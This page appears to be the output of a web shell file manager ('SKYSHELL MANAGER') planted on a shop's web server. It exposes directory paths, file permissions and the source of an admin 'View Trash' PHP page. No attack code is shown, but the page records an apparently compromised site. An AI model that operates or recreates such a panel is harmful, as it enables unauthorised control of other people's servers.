📁
SKYSHELL MANAGER-
🛒
PHP v7.4.33
Create Folder
Create File
Current Path:
home
/
oshofree
/
public_html
/
chbluxuries.com
/
chb_data
/
Name
Size
Permissions
Actions
📁
..
-
0755
🗑️
🔒
📄
config.php
7.06 KB
0444
🗑️
⬇️
✏️
🔒
📄
error_log
13324.38 KB
0644
🗑️
⬇️
✏️
🔒
Editing: trash.php
<?php include "admin_header.php"; $_SESSION['previous_pages'] = $_SERVER['REQUEST_URI']; ?> <!-- Begin Page Content --> <div class="container-fluid"> <!-- Page Heading --> <h1 class="h6 mb-4 text-gray-800">View Trash </h1> <?php include "deletestock.php"; ?></p> <div class="overflow-auto" id="stocks"></div> <div class="overflow-auto" style="margin-bottom:20% !important;"> <table class="table table-bordered" id="dataTable" width="100%" cellspacing="0" style="color:black; font-size:13px; font-weight:500;"> <thead><tr bgcolor="#FF339A" style="color:white;"> <th data-column-id='employee_salary' width='200px'>Actions</th> <th data-column-id='employee_salary'></th> <th data-column-id='employee_name' width='200px'>Barcode</th> <th data-column-id='employee_name' width='200px'>Item</th> <th data-column-id='employee_salary' width='200px'>Retail Price</th> <th data-column-id='employee_salary' width='200px'>Wholesales Price</th> </tr> </thead> <?php include "trash_display.php"; ?> </table> </div> </div> <!-- /.container-fluid --> </div> <!-- End of Main Content --> <?php include "footer.php"; ?>
💾 Save Changes